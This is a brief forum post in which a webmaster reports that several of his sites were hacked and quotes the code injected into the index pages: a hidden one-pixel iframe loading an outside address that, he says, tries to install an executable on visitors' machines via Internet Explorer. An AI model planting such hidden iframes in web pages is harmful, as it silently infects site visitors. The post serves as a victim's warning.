Guys:
a couple of my sites were hacked into a few days ago and the f*ckers put this code in the index pages:
<div style="visibility

dden"><iframe src="http://us-counter.com/trf/" width=1 height=1></iframe></div>
This thing tries to install an executable to the surfer's computer via their browser (works on IE, not on FF)